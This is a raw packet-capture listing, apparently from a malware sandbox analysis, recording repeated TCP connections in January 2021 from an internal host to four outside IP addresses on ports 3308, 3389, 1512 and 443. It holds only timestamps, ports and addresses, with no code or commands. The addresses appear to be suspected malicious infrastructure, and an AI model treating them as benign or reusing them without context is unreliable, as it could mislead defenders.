Jan 12, 2021 07:41:37.542119026 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.582021952 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.585323095 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.585477114 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.697527885 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.697556019 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.697788000 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.703469038 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.746638060 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.820631981 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:37.874185085 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:37.874396086 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:37.875665903 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:37.928982973 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:37.960156918 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:37.960196018 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:37.960272074 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:37.960302114 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:37.976191044 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.040307999 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.040544987 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.053265095 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.053442001 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.361272097 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.414987087 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.415222883 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.468486071 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.468512058 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.558343887 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.558373928 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.558619976 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.558682919 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.565313101 CET	49360	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:38.618915081 CET	3389	49360	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:38.682008982 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.734891891 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.735011101 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.736773968 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.789573908 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.796436071 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.796454906 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.796575069 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.808095932 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.862104893 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.862282991 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.866566896 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.866739035 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.921596050 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.921788931 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:38.959851980 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:38.974642992 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:39.075222015 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:39.075247049 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:39.075424910 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:39.078385115 CET	49361	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:39.133183002 CET	1512	49361	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:39.193206072 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.245553017 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.245676041 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.246963024 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.299009085 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.306799889 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.306931019 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.319432020 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.373933077 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.374241114 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.383683920 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.383958101 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.436075926 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.436327934 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.488424063 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.606034040 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.606081009 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.606338024 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.611201048 CET	49362	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:39.663261890 CET	443	49362	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:39.726926088 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.770176888 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:39.770395994 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.771868944 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.815028906 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:39.827898026 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:39.827924013 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:39.828031063 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.840029001 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.885051012 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:39.885210991 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.892673016 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.892935038 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.938729048 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:39.938893080 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:39.982896090 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:40.095662117 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:40.095688105 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:40.095870018 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:40.098937988 CET	49363	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:40.142436028 CET	3308	49363	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:40.206417084 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.260796070 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.261010885 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.276552916 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.331063032 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.345752954 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.345779896 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.345880985 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.358030081 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.416937113 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.417288065 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.428030014 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.428307056 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.482168913 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.482395887 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.521486044 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.536288023 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.536326885 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.626981974 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.627058029 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.627315998 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.629951000 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.631241083 CET	49364	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:40.685190916 CET	3389	49364	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:40.771972895 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.827871084 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:40.827996969 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.829324961 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.882091045 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:40.888995886 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:40.889034986 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:40.889144897 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.889175892 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.904828072 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.962254047 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:40.962531090 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.981815100 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:40.982587099 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:41.035262108 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:41.035391092 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:41.073066950 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:41.088179111 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:41.192446947 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:41.192472935 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:41.192656994 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:41.195533991 CET	49365	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:41.248275042 CET	1512	49365	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:41.341698885 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.393896103 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.394000053 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.395092010 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.447035074 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.457151890 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.457309961 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.470928907 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.525398970 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.525619030 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.533205032 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.533546925 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.585570097 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.585794926 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.637798071 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.755275011 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.755294085 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.755353928 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.755388975 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.759048939 CET	49366	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:41.810971022 CET	443	49366	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:41.909768105 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:41.953099966 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:41.953214884 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:41.954843998 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:41.997801065 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.008408070 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.008429050 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.008544922 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.019915104 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.065058947 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.065246105 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.069166899 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.069343090 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.112468004 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.112714052 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.152960062 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.155749083 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.155766010 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.268537045 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.268556118 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.268923044 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.274646044 CET	49367	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:42.317612886 CET	3308	49367	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:42.394648075 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.448947906 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.449080944 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.450761080 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.504231930 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.533262014 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.533293009 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.533401012 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.540153027 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.603184938 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.603553057 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.616981983 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.617100954 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.670943975 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.671175003 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.710675001 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.724719048 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.724760056 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.817811966 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.817845106 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.818053007 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.824484110 CET	49368	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:42.878092051 CET	3389	49368	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:42.936368942 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:42.989208937 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:42.989298105 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:42.990315914 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.043083906 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.050121069 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.050142050 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.050230026 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.062347889 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.116436005 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.116676092 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.123744011 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.123976946 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.176784039 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.177066088 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.213154078 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.229957104 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.229983091 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.328193903 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.328218937 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.328476906 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.334072113 CET	49369	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:43.386909962 CET	1512	49369	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:43.456523895 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.508444071 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.508579016 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.510374069 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.561955929 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.569616079 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.569710970 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.583785057 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.637870073 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.638236046 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.648749113 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.649117947 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.700892925 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.701241970 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.752984047 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.872272968 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.872299910 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.873065948 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.876950979 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:43.928638935 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:43.994777918 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.037962914 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.038062096 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.039100885 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.082062960 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.092875957 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.092896938 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.092995882 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.093031883 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.100709915 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.145520926 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.145605087 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.149864912 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.150027037 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.193048000 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.193145990 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.233088017 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.236366034 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.236382008 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.350347042 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.350646019 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.350863934 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.350949049 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.356434107 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:44.399754047 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:44.470227957 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.524252892 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.524374962 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.526004076 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.579852104 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.599102020 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.599123955 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.599205971 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.611044884 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.672297955 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.672522068 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.682391882 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.682668924 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.736638069 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.736958981 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.776310921 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.790786028 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.790807962 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.882289886 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.882328987 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:44.886260986 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.888377905 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:44.942542076 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:45.005775928 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.058964014 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.059108019 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.060892105 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.113893986 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.121138096 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.121161938 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.121237993 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.128344059 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.182499886 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.182646036 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.192378044 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.192579985 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.245536089 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.245734930 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.285223007 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.298702955 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.399568081 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.399588108 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.399676085 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.403846979 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:45.456804037 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:45.511235952 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.563283920 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.563409090 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.564354897 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.616250992 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.630964041 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.631061077 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.644074917 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:45.701097965 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:45.701338053 CET	49374	443	192.168.2.22	77.220.64.37
